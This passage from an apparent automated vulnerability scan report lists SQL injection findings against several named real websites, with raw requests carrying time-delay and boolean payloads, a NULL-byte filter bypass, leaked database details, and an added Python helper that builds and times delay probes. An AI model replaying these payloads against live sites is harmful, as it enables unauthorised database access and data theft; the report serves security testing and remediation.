...[SNIP]...

2.10. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 25261 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?1,0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.11. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header. The application took 51643 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=',0)waitfor%20delay'0%3a0%3a20'--
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:37:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.12. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header. The application took 52381 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24')waitfor%20delay'0%3a0%3a20'--
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:31:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.13. https://secure.trust-guard.com/ResetPassword.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 50215 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:11:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.14. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to SQL injection attacks. The payloads 19587081'%20or%201%3d1--%20 and 19587081'%20or%201%3d2--%20 were each submitted in the txtEmail parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 43

txtEmail=19587081'%20or%201%3d1--%20&btnSubmit=Submit&btnCancel=Cancel

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Trust Guard Login</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br /><br />
<script type="text/javascript">

function validateForm()
{
var message;
var nouser = (!validatePresent(document.getElementById('txtEmail'),'msg_user'));
var nopass = (!validatePresent(document.getElementById('txtPassword'),'msg_pass'));
if (nouser && nopass)
message = 'Please enter a username and a password.';
else if (nouser)
message = 'Please enter a username.';
else if (nopass)
message = 'Please enter a password.';

...[SNIP]...

Request 2

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 43

txtEmail=19587081'%20or%201%3d2--%20&btnSubmit=Submit&btnCancel=Cancel

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="19587081' or 1=2-- " style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' >Could not find an account will the site 19587081' or 1=2-- .</span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEm
...[SNIP]...

2.15. https://secure.trust-guard.com/index.php [__utmb cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 24998 milliseconds to respond to the request, compared with 6249 milliseconds for the original request; the difference of about 18.7 seconds is close to the 20-second delay requested, indicating that the injected SQL command caused a time delay. Note that a 6249-millisecond baseline is itself slow for a plain GET /index.php and suggests the original request was timed while other delay probes were running against the host; repeat both requests in isolation with several delay values (for example 5, 10 and 20 seconds) and confirm that the response time tracks the requested delay before relying on the Certain rating. The ',0,0)' fragment that closes the literal suggests the cookie value is written into a parenthesised value list followed by two further columns, as an INSERT that logs the visit would do; that is an inference from the payload shape, not something the response shows.

The database appears to be Microsoft SQL Server; the inference rests on the SQL Server specific waitfor delay syntax having taken effect, not on any banner. The front end is PHP on Apache/CentOS (PHPSESSID cookie, Server header), so the SQL Server instance would be a separate back end that the PHP code talks to.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384',0,0)waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:13:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.16. https://secure.trust-guard.com/index.php [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 25028 milliseconds to respond to the request, compared with 6249 milliseconds for the original request; the difference of about 18.8 seconds is close to the 20-second delay requested, indicating that the injected SQL command caused a time delay. The same caveat as for the __utmb cookie applies: the 6249-millisecond baseline is the same figure reused from that test and is itself slow for a plain GET, so re-measure both requests in isolation, with varying delay values, before treating the finding as confirmed. The closing fragment that worked here is ',0)' rather than ',0,0)', so __utmz is probably written by a different statement, or at a different position in the value list, than __utmb.

The database appears to be Microsoft SQL Server (inferred from the SQL Server specific waitfor delay syntax taking effect, not from a banner).

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:06:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.17. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted as an extra path segment after /index.php (GET /index.php/1'waitfor..., i.e. PATH_INFO rather than a query string parameter), which the scanner reports as the name of an arbitrarily supplied request parameter. The application took 50183 milliseconds to respond to the request, compared with 25087 milliseconds for the original request. The 25-second difference is consistent with the requested delay, but the baseline itself is 25 seconds, roughly one requested delay, so the original request was almost certainly timed while another delay probe was executing on the server. Re-measure both requests with no other probes in flight; until then this finding should be rated Tentative rather than Certain.

The database appears to be Microsoft SQL Server (inferred from the waitfor delay syntax taking effect).

Request

GET /index.php/1'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:55:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.18. https://subscribe.haymarketmedia.com/scm/ [form parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The form parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the form parameter. The application took 20441 milliseconds to respond to the request, compared with 380 milliseconds for the original request; a 20-second difference against a fast, stable baseline matches the requested delay exactly, indicating that the injected SQL command caused a time delay. This is the cleanest of the four time-based findings in this report and the one least in need of re-measurement.

The database appears to be Microsoft SQL Server, consistent with the Microsoft-IIS/7.5 and ASP.NET 2.0.50727 response headers.

Request

GET /scm/?form='waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vdpcmz451e1pnq55altbbjzz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:49 GMT
Content-Length: 5478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
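
The four time-based findings above (2.15 to 2.18) all rest on one request pair each, and two of them have a baseline that is itself as slow as the requested delay. The following is an added example, not part of the original report and not the scanner's code, of the verification logic a tester would apply before rating such a finding Certain: it builds the same waitfor delay probe with a chosen delay, places it in a cookie the way the report's requests do, and decides from repeated samples, a zero-second control and several delay values whether the slowdown is the payload's doing. Nothing here sends traffic; the timing samples are constructed from the millisecond figures quoted in the report, and the function names are hypothetical.

```python
"""Verification logic for the time-based (waitfor delay) findings 2.15 to 2.18.

Added example; not part of the original report and not the scanner's code. Nothing here
sends traffic: the timing samples are constructed from the millisecond figures the report
quotes, and the function names are hypothetical.
"""
import statistics
from urllib.parse import quote


def mssql_delay_payload(prefix: str, seconds: int) -> str:
    """Build the SQL Server delay probe the report used.

    prefix is the literal-closing fragment that matched the target statement
    (the report's ',0,0)' for __utmb, ',0)' for __utmz, a bare ' for a query value).
    Example: mssql_delay_payload("',0,0)", 20) -> "',0,0)waitfor delay'0:0:20'--"
    """
    if not 0 <= seconds < 60:
        raise ValueError("vary the delay between probes, but keep it under a minute")
    return f"{prefix}waitfor delay'0:0:{seconds}'--"


def cookie_header(cookies: dict, name: str, payload: str) -> str:
    """Return a Cookie header with payload appended to cookie `name`, URL-encoded as in
    the report's requests (space -> %20, colon -> %3A; quotes and parentheses kept)."""
    parts = []
    for k, v in cookies.items():
        if k == name:
            v += quote(payload, safe="'(),-")
        parts.append(f"{k}={v}")
    return "; ".join(parts)


def delay_verdict(baseline_ms, injected_ms, delay_s, control_ms=None):
    """Decide whether the injected samples show the requested delay.

    baseline_ms  timings of the unmodified request
    injected_ms  timings with the delay probe
    delay_s      seconds requested in the probe
    control_ms   optional timings with the same probe but a 0 second delay; a real
                 injection is slow only when delay_s > 0
    Returns (confirmed, notes); notes carry re-measurement warnings even when confirmed.
    """
    notes = []
    base = statistics.median(baseline_ms)
    inj = statistics.median(injected_ms)
    delta_s = (inj - base) / 1000.0
    # 1. The whole requested delay must show up (20% tolerance for jitter).
    if delta_s < 0.8 * delay_s:
        notes.append(f"median delta {delta_s:.1f}s is under 80% of the requested {delay_s}s")
        return False, notes
    # 2. The slowest baseline sample must still beat the fastest injected sample.
    if max(baseline_ms) >= min(injected_ms):
        notes.append("baseline and injected timings overlap; take more samples")
        return False, notes
    # 3. A zero-second control that is also slow means the server, not the payload, is slow.
    if control_ms is not None and (statistics.median(control_ms) - base) / 1000.0 > 0.5 * delay_s:
        notes.append("zero-delay control is as slow as the probe: server-side delay, not injection")
        return False, notes
    # Warnings that do not refute the finding but do block a 'Certain' rating.
    if min(len(baseline_ms), len(injected_ms)) < 3:
        notes.append("fewer than 3 samples per arm; repeat before rating the finding Certain")
    if base >= delay_s * 1000:
        notes.append("baseline is as slow as the requested delay; re-measure with no other "
                     "probes in flight (other waitfor probes against the same host skew it)")
    return True, notes


def scales_with_delay(median_ms_by_delay: dict) -> bool:
    """True when the measured slowdown tracks the requested delay one-for-one (within 20%)
    across several delay values, e.g. {0: 380, 5: 5400, 10: 10400, 20: 20441}. The dict must
    include a 0-second control. A slowdown that stays constant whatever delay is requested
    is not the payload's doing."""
    items = sorted(median_ms_by_delay.items())
    if items[0][0] != 0:
        raise ValueError("include a 0-second control measurement")
    zero = items[0][1]
    for delay, ms in items[1:]:
        ratio = (ms - zero) / 1000.0 / delay
        if not 0.8 <= ratio <= 1.2:
            return False
    return True


if __name__ == "__main__":
    # The report's own figures: single samples, so both verdicts carry warnings.
    print(delay_verdict([6249], [24998], 20))    # finding 2.15
    print(delay_verdict([25087], [50183], 20))   # finding 2.17: baseline already 25 s
    print(cookie_header({"PHPSESSID": "x", "__utmb": "147269874.1.10.1304747384"},
                        "__utmb", mssql_delay_payload("',0,0)", 20)))
```

Run against the report's numbers, 2.15 comes back confirmed with a single-sample warning, and 2.17 comes back confirmed but with the additional warning that its baseline is as slow as the delay it is supposed to be detecting; both need the repeated, isolated measurement the notes ask for before a Certain rating is justified.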

2.19. http://tours.sapha.com/ [scs_sid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_sid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the scs_sid parameter, appended to an earlier time-delay probe (-111' OR SLEEP(25)=0 LIMIT 1-- ) that was still in the parameter value, and a database error message was returned. The error text echoes the full statement being executed (select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 ...) together with the internal database host 192.168.50.20, the database name sapha_core and the database user www, which is an information disclosure in its own right. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database is MySQL: the error text names it, and 1064 is MySQL's syntax error code.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked: a filter that handles the value as a C string stops reading at the NULL byte, while PHP and MySQL receive and process the whole value, including the quote that follows it.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses; here they also reveal the query text, the internal database host, and the database and user names. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are terminated by a NULL byte. Fix the actual vulnerability in the application code by passing scs_sid to the database as a bound parameter of a prepared statement (or, if the site ID is always numeric, by casting it to an integer first), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+%00'&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:14:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 412

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0
...[SNIP]...
